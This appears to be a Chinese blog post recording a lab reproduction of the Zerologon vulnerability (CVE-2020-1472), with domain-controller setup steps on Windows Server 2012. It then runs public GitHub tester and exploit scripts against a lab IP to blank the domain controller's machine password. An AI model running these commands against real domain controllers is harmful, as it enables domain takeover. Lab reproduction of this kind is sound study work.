CVE-2020-1472复现打域控(包含Win Server 2012域环境搭建)
目的
Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,同时其设置域控密码的远程接口也使用了该函数,导致可以将域控中保存在AD中的管理员password设置为空。
复现环境
DC:os:windows 2012 server ip:192.168.59.141
攻击机:os:kali ip:192.168.59.128
影响版本
Windows Server 2008 R2 for x64-based Systems Service Pack 1Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 2012 Windows Server 2012 (Server Core installation) Windows Server 2012 R2 Windows Server 2012 R2 (Server Core installation) Windows Server 2016 Windows Server 2016 (Server Core installation) Windows Server 2019 Windows Server 2019 (Server Core installation) Windows Server, version 1903 (Server Core installation) Windows Server, version 1909 (Server Core installation) Windows Server, version 2004 (Server Core installation)
Win Server 2012域环境搭建
搭建windows server 2012域环境
安装虚拟机Windows server2012R2标准版

分配足够大的内存(至少8G)

等待安装成功

启动管理员账户Administrator,设置新的密码

注销当前账户,登录到Adminnistrator账户

设置静态IP地址192.168.92.145

添加DNS服务器

安装成功后进入DNS管理

创建一个正向解析记录

创建成功

添加角色或功能,添加AD域服务

安装成功将此服务器提升为域控制器

建立新林

设置密码

提供凭证,输入管理员账号密码

设置NETBIOS域名

下一步至先决条件检查,不意外的话点击安装并重启

重启之后添加角色或功能,安装IIS服务,

搭建完毕后,可以使用Netdom query fsmo命令查看域环境信息

用nbtstat -n 获取当前机器的NetBIOS名称

查看域控主机ip地址
至此域环境搭建完毕
CVE-2020-1472 复现
下载poc:https://github.com/SecuraBV/CVE-2020-1472
验证漏洞是否存在:
python3 /home/kali/Desktop/zerologon_tester.py WIN-PEB4H6RPOC2 192.168.59.141
如下图所示,漏洞存在

下载exp: git clone https://github.com/dirkjanm/CVE-2020-1472
置空DC的密码
python3 /home/kali/Desktop/cve-2020-1472-exploit.py WIN-PEB4H6RPOC2 192.168.59.141

至此我们就成功地将域控中保存在AD中的管理员password设置为空,方便下一步的渗透。

5277

被折叠的 条评论
为什么被折叠?



